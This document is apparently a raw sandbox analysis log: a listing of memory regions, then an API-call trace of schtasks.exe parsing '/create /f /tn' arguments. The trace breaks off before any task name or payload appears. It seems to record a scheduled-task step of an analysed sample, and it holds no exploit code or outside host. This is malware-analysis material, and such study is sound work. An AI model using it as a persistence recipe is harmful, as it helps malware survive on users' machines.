entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 1966
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1967
start_va = 0x1b40000
end_va = 0x1e0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1968
start_va = 0x73a10000
end_va = 0x73a8ffff
monitored = 0
entry_point = 0x73a237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1969
start_va = 0x1e10000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Region:
id = 1970
start_va = 0x1e10000
end_va = 0x1eeefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e10000"
filename = ""
Region:
id = 1971
start_va = 0x1f30000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f30000"
filename = ""
Region:
id = 1972
start_va = 0x200000
end_va = 0x23ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1973
start_va = 0x2010000
end_va = 0x204ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002010000"
filename = ""
Region:
id = 1974
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1975
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 1976
start_va = 0x754c0000
end_va = 0x75542fff
monitored = 0
entry_point = 0x754c23d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1977
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1978
start_va = 0x6ea10000
end_va = 0x6ea8cfff
monitored = 0
entry_point = 0x6ea1166a
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 29
os_tid = 0x650
[0169.545] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fcd0 | out: lpSystemTimeAsFileTime=0x28fcd0*(dwLowDateTime=0xde9ea0a0, dwHighDateTime=0x1d8a8be))
[0169.545] GetCurrentProcessId () returned 0x7d0
[0169.545] GetCurrentThreadId () returned 0x650
[0169.545] GetTickCount () returned 0x166fe42
[0169.545] RtlQueryPerformanceCounter () returned 0x1
[0169.545] GetModuleHandleA (lpModuleName=0x0) returned 0x2c0000
[0169.545] __set_app_type (_Type=0x1)
[0169.545] __p__fmode () returned 0x754b31f4
[0169.545] __p__commode () returned 0x754b31fc
[0169.546] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2d7881) returned 0x0
[0169.546] __wgetmainargs (in: _Argc=0x2e9e6c, _Argv=0x2e9e74, _Env=0x2e9e70, _DoWildCard=0, _StartInfo=0x2e9e80 | out: _Argc=0x2e9e6c, _Argv=0x2e9e74, _Env=0x2e9e70) returned 0
[0169.547] _onexit (_Func=0x2e0fe2) returned 0x2e0fe2
[0169.547] _onexit (_Func=0x2e0ff3) returned 0x2e0ff3
[0169.547] _onexit (_Func=0x2e1002) returned 0x2e1002
[0169.547] _onexit (_Func=0x2e101e) returned 0x2e101e
[0169.547] _onexit (_Func=0x2e103a) returned 0x2e103a
[0169.548] _onexit (_Func=0x2e1056) returned 0x2e1056
[0169.548] _onexit (_Func=0x2e1072) returned 0x2e1072
[0169.549] _onexit (_Func=0x2e108e) returned 0x2e108e
[0169.549] _onexit (_Func=0x2e10aa) returned 0x2e10aa
[0169.549] _onexit (_Func=0x2e10c6) returned 0x2e10c6
[0169.549] _onexit (_Func=0x2e10e2) returned 0x2e10e2
[0169.549] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0169.549] WinSqmIsOptedIn () returned 0x0
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x2ff058
[0169.550] SetLastError (dwErrCode=0x0)
[0169.550] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0169.550] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0169.550] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0169.550] VerifyVersionInfoW (in: lpVersionInformation=0x28f748, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x28f748) returned 1
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304ba8
[0169.550] lstrlenW (lpString="") returned 0
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x2) returned 0x304f90
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x304fa0
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304bc0
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x304fc0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x304fe0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305000
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305020
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304bd8
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305040
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305060
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305080
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3050a0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304bf0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3050c0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3050e0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305118
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305138
[0169.551] SetThreadUILanguage (LangId=0x0) returned 0x409
[0169.552] SetLastError (dwErrCode=0x0)
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305158
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305178
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305198
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3051b8
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3051d8
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304c08
[0169.552] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x208) returned 0x305a80
[0169.552] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x305a80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0169.553] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x733a0000
[0169.555] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoSizeW") returned 0x733a19d9
[0169.555] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0169.555] GetProcessHeap () returned 0x2f0000
[0169.555] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x74e) returned 0x305c90
[0169.556] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoW") returned 0x733a19f4
[0169.556] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x305c90 | out: lpData=0x305c90) returned 1
[0169.556] GetProcAddress (hModule=0x733a0000, lpProcName="VerQueryValueW") returned 0x733a1b51
[0169.556] VerQueryValueW (in: pBlock=0x305c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28f850, puLen=0x28f854 | out: lplpBuffer=0x28f850*=0x30602c, puLen=0x28f854) returned 1
[0169.562] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.562] _vsnwprintf (in: _Buffer=0x305a80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x28f838 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0169.562] VerQueryValueW (in: pBlock=0x305c90, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x28f860, puLen=0x28f85c | out: lplpBuffer=0x28f860*=0x305e58, puLen=0x28f85c) returned 1
[0169.562] lstrlenW (lpString="schtasks.exe") returned 12
[0169.562] lstrlenW (lpString="schtasks.exe") returned 12
[0169.562] lstrlenW (lpString=".EXE") returned 4
[0169.562] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0169.564] lstrlenW (lpString="schtasks.exe") returned 12
[0169.564] lstrlenW (lpString=".EXE") returned 4
[0169.564] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.564] lstrlenW (lpString="schtasks") returned 8
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305218
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305238
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305258
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305278
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304c68
[0169.565] _memicmp (_Buf1=0x304c68, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0xa0) returned 0x306670
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305298
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3052b8
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3052d8
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304c80
[0169.566] _memicmp (_Buf1=0x304c80, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x200) returned 0x306718
[0169.566] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x306718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0169.566] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x30) returned 0x306920
[0169.566] _vsnwprintf (in: _Buffer=0x306670, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x28f83c | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305c90) returned 1
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305c90) returned 0x74e
[0169.567] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305c90 | out: hHeap=0x2f0000) returned 1
[0169.567] SetLastError (dwErrCode=0x0)
[0169.567] GetThreadLocale () returned 0x409
[0169.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.567] lstrlenW (lpString="?") returned 1
[0169.567] GetThreadLocale () returned 0x409
[0169.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.567] lstrlenW (lpString="create") returned 6
[0169.567] GetThreadLocale () returned 0x409
[0169.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.567] lstrlenW (lpString="delete") returned 6
[0169.567] GetThreadLocale () returned 0x409
[0169.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.567] lstrlenW (lpString="query") returned 5
[0169.567] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] lstrlenW (lpString="change") returned 6
[0169.568] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] lstrlenW (lpString="run") returned 3
[0169.568] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] lstrlenW (lpString="end") returned 3
[0169.568] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] lstrlenW (lpString="showsid") returned 7
[0169.568] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] SetLastError (dwErrCode=0x0)
[0169.568] SetLastError (dwErrCode=0x0)
[0169.568] lstrlenW (lpString="/create") returned 7
[0169.568] lstrlenW (lpString="-/") returned 2
[0169.568] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.568] lstrlenW (lpString="?") returned 1
[0169.568] lstrlenW (lpString="?") returned 1
[0169.568] GetProcessHeap () returned 0x2f0000
[0169.568] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304c98
[0169.568] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.568] GetProcessHeap () returned 0x2f0000
[0169.568] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0xa) returned 0x304cb0
[0169.568] lstrlenW (lpString="create") returned 6
[0169.568] GetProcessHeap () returned 0x2f0000
[0169.568] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304cc8
[0169.569] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.569] GetProcessHeap () returned 0x2f0000
[0169.569] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3052f8
[0169.569] _vsnwprintf (in: _Buffer=0x304cb0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|?|") returned 3
[0169.569] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.569] lstrlenW (lpString="|?|") returned 3
[0169.569] lstrlenW (lpString="|create|") returned 8
[0169.569] SetLastError (dwErrCode=0x490)
[0169.569] lstrlenW (lpString="create") returned 6
[0169.569] lstrlenW (lpString="create") returned 6
[0169.569] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.569] GetProcessHeap () returned 0x2f0000
[0169.569] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cb0) returned 1
[0169.569] GetProcessHeap () returned 0x2f0000
[0169.569] RtlReAllocateHeap (Heap=0x2f0000, Flags=0xc, Ptr=0x304cb0, Size=0x14) returned 0x305318
[0169.569] lstrlenW (lpString="create") returned 6
[0169.569] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.569] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.569] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.569] lstrlenW (lpString="|create|") returned 8
[0169.569] lstrlenW (lpString="|create|") returned 8
[0169.570] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|"
[0169.570] SetLastError (dwErrCode=0x0)
[0169.570] SetLastError (dwErrCode=0x0)
[0169.570] SetLastError (dwErrCode=0x0)
[0169.570] lstrlenW (lpString="/f") returned 2
[0169.570] lstrlenW (lpString="-/") returned 2
[0169.570] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.570] lstrlenW (lpString="?") returned 1
[0169.570] lstrlenW (lpString="?") returned 1
[0169.570] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.570] lstrlenW (lpString="f") returned 1
[0169.570] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.570] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|?|") returned 3
[0169.570] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.570] lstrlenW (lpString="|?|") returned 3
[0169.570] lstrlenW (lpString="|f|") returned 3
[0169.570] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0169.570] SetLastError (dwErrCode=0x490)
[0169.570] lstrlenW (lpString="create") returned 6
[0169.570] lstrlenW (lpString="create") returned 6
[0169.570] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.570] lstrlenW (lpString="f") returned 1
[0169.570] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.570] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.570] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.571] lstrlenW (lpString="|create|") returned 8
[0169.571] lstrlenW (lpString="|f|") returned 3
[0169.571] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0169.571] SetLastError (dwErrCode=0x490)
[0169.571] lstrlenW (lpString="delete") returned 6
[0169.571] lstrlenW (lpString="delete") returned 6
[0169.571] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.571] lstrlenW (lpString="f") returned 1
[0169.571] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.571] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|delete|") returned 8
[0169.571] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.571] lstrlenW (lpString="|delete|") returned 8
[0169.571] lstrlenW (lpString="|f|") returned 3
[0169.571] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0169.571] SetLastError (dwErrCode=0x490)
[0169.571] lstrlenW (lpString="query") returned 5
[0169.571] lstrlenW (lpString="query") returned 5
[0169.571] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.571] lstrlenW (lpString="f") returned 1
[0169.571] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.571] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x8, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|query|") returned 7
[0169.571] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.571] lstrlenW (lpString="|query|") returned 7
[0169.571] lstrlenW (lpString="|f|") returned 3
[0169.572] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0169.572] SetLastError (dwErrCode=0x490)
[0169.572] lstrlenW (lpString="change") returned 6
[0169.572] lstrlenW (lpString="change") returned 6
[0169.572] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.572] lstrlenW (lpString="f") returned 1
[0169.572] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.572] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|change|") returned 8
[0169.572] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.572] lstrlenW (lpString="|change|") returned 8
[0169.572] lstrlenW (lpString="|f|") returned 3
[0169.572] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0169.572] SetLastError (dwErrCode=0x490)
[0169.572] lstrlenW (lpString="run") returned 3
[0169.572] lstrlenW (lpString="run") returned 3
[0169.572] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.572] lstrlenW (lpString="f") returned 1
[0169.572] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.572] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|run|") returned 5
[0169.572] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.572] lstrlenW (lpString="|run|") returned 5
[0169.572] lstrlenW (lpString="|f|") returned 3
[0169.572] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0169.572] SetLastError (dwErrCode=0x490)
[0169.572] lstrlenW (lpString="end") returned 3
[0169.572] lstrlenW (lpString="end") returned 3
[0169.573] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.573] lstrlenW (lpString="f") returned 1
[0169.573] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.573] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|end|") returned 5
[0169.573] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.573] lstrlenW (lpString="|end|") returned 5
[0169.573] lstrlenW (lpString="|f|") returned 3
[0169.573] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0169.573] SetLastError (dwErrCode=0x490)
[0169.573] lstrlenW (lpString="showsid") returned 7
[0169.573] lstrlenW (lpString="showsid") returned 7
[0169.573] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.573] GetProcessHeap () returned 0x2f0000
[0169.573] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305318) returned 1
[0169.573] GetProcessHeap () returned 0x2f0000
[0169.573] RtlReAllocateHeap (Heap=0x2f0000, Flags=0xc, Ptr=0x305318, Size=0x16) returned 0x305338
[0169.573] lstrlenW (lpString="f") returned 1
[0169.573] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.573] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0xa, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|showsid|") returned 9
[0169.573] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.573] lstrlenW (lpString="|showsid|") returned 9
[0169.573] lstrlenW (lpString="|f|") returned 3
[0169.573] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0169.573] SetLastError (dwErrCode=0x490)
[0169.574] SetLastError (dwErrCode=0x490)
[0169.574] SetLastError (dwErrCode=0x0)
[0169.574] lstrlenW (lpString="/f") returned 2
[0169.574] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0169.574] SetLastError (dwErrCode=0x490)
[0169.574] SetLastError (dwErrCode=0x0)
[0169.574] lstrlenW (lpString="/f") returned 2
[0169.574] GetProcessHeap () returned 0x2f0000
[0169.574] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x6) returned 0x306958
[0169.574] GetProcessHeap () returned 0x2f0000
[0169.574] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305318
[0169.574] SetLastError (dwErrCode=0x0)
[0169.574] SetLastError (dwErrCode=0x0)
[0169.574] lstrlenW (lpString="/tn") returned 3
[0169.574] lstrlenW (lpString="-/") returned 2
[0169.574] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.574] lstrlenW (lpString="?") returned 1
[0169.574] lstrlenW (lpString="?") returned 1
[0169.574] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.574] lstrlenW (lpString="tn") returned 2
[0169.574] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.574] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|?|") returned 3
